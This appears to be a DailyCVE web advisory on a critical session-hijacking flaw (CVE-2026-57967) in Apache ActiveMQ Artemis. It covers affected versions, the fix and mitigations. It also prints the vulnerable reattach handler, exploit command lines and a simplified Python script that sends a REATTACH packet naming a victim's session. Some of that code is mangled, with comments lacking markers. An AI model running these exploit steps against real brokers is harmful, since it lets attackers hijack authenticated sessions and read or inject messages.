Apache ActiveMQ Artemis, Session Hijacking, CVE-2026-57967 (Critical) -DC-Oct2026-2781

Listen to this Post

CVE-2026-57967 is a critical authentication bypass vulnerability in Apache ActiveMQ Artemis and Apache Artemis that allows unauthenticated remote attackers to hijack authenticated CORE-protocol sessions. The flaw resides in the `SESSION_REATTACH` packet handling within the `ActiveMQPacketHandler` class. In affected versions, the CORE protocol multiplexes channels over a single TCP connection, with Channel 1 serving as the session-management channel. Critically, this channel requires no handshake before use, and the `handleReattachSession` method processes `REATTACH_SESSION` (type 32) packets without any authentication check. The handler retrieves the victim’s session handler by name only through protocolManager.getSessionHandler(request.getName()), never consulting the `SecurityStore` or validating the requester’s identity. When a valid session name is supplied, the broker calls sessionHandler.transferConnection(), which rebinds the victim’s server-side channel to the attacker’s TCP connection, replays the channel’s unconfirmed command cache, and transfers all message deliveries to the attacker’s socket. The vulnerability affects Apache Artemis versions 2.50.0 through 2.56.0 and Apache ActiveMQ Artemis versions 1.0.0 through 2.44.0. The issue was resolved in version 2.57.0 via ARTEMIS-6245, which disabled the reattachment mechanism entirely by deleting the server handler and making the `REATTACH` case always return ReattachSessionResponseMessage(-1). This vulnerability aligns with CWE-384 (Session Fixation) and CWE-290 (Authentication Bypass by Spoofing), enabling attackers to assume full control over authenticated sessions without credentials, potentially leading to unauthorized message consumption, injection, or administrative actions within the victim’s permissions.

DailyCVE Form:

Platform: ActiveMQ Artemis
Version: 2.50.0-2.56.0
Vulnerability : Session Hijacking
Severity: Critical
date: 2026-09-10

Prediction: 2026-09-10

What Undercode Say:

Check Artemis version
nc -zv target 61616
Sniff session names
python3 tools/sniffer.py -t target -p 61616
Nuclei template scan
nuclei -u tcp://target:61616 -t nuclei/cve-2026-57967.yaml
Python exploit
python3 exploit.py --target target --port 61616 --session victim-session-name
Go exploit
go run go/main.go -target target:61616 -session victim-session-name
Docker lab
cd stand && docker compose up -d && cd ..
./demo.sh
// ActiveMQPacketHandler.java (vulnerable)
private void handleReattachSession(final ReattachSessionMessage request) {
ServerSessionPacketHandler sessionHandler =
protocolManager.getSessionHandler(request.getName());
if (sessionHandler == null) {
response = new ReattachSessionResponseMessage(-1, false);
} else if (sessionHandler.getChannel().getConfirmationWindowSize() == -1) {
// DoS branch
} else {
int serverLastConfirmedCommandID =
sessionHandler.transferConnection(connection,
request.getLastConfirmedCommandID());
response = new ReattachSessionResponseMessage(
serverLastConfirmedCommandID, true);
}
}
exploit.py (simplified)
import socket
import struct
def send_reattach(target, port, session_name):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, port))
Build CORE protocol REATTACH_SESSION packet
packet = struct.pack('>B', 32) Type 32
packet += session_name.encode() + b'\x00'
packet += struct.pack('>i', 0) lastConfirmedCommandID
sock.send(packet)
response = sock.recv(1024)
return response

Exploit: (Educational Purposes!)

The exploit leverages the missing authentication check in the `SESSION_REATTACH` packet handler. An attacker first identifies a valid session name through passive sniffing of CORE protocol traffic or by guessing common session naming patterns. Once a session name is known, the attacker crafts a `ReattachSessionMessage` containing only the target session name and an integer `lastConfirmedCommandID` value. The packet is sent to the broker’s CORE acceptor, typically on port 61616. Upon successful reattachment, the attacker’s TCP connection inherits the victim’s full security context, including all permissions associated with the authenticated user. The attacker can then issue `SESS_` packets to browse messages, consume from queues, send messages, acknowledge deliveries, or perform queue and address management operations within the victim’s permissions. Message deliveries destined for the victim’s consumers are redirected to the attacker’s socket, while the victim’s connection becomes unresponsive.

Protection: from this CVE

Upgrade to Apache ActiveMQ Artemis version 2.57.0 or later, which contains the fix for ARTEMIS-6245. This version disables the session reattachment mechanism by removing the `handleReattachSession` method and ensuring that all `REATTACH` requests receive a failure response. For organizations unable to upgrade immediately, restrict network access to the CORE acceptor port (default 61616) to trusted clients only. Enable TLS with client certificate authentication on the CORE acceptor to provide an additional authentication layer. Monitor broker logs for unexpected session reattachment attempts or anomalous session activity. Implement network segmentation to prevent unauthorized access to messaging infrastructure.

Impact:

Successful exploitation allows an attacker to completely assume an authenticated user’s session without providing any credentials. This results in full confidentiality breach, as the attacker can read all messages processed by the compromised session. Integrity is compromised through the ability to send fraudulent messages, modify queue configurations, or delete critical records. Availability is impacted as the attacker can disrupt message flows, consume resources, or cause denial of service by manipulating the hijacked session. The CVSS v3 base score is 9.8 (Critical), with high impacts on confidentiality, integrity, and availability. The attack requires no privileges, no user interaction, and can be executed remotely over the network with low complexity.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top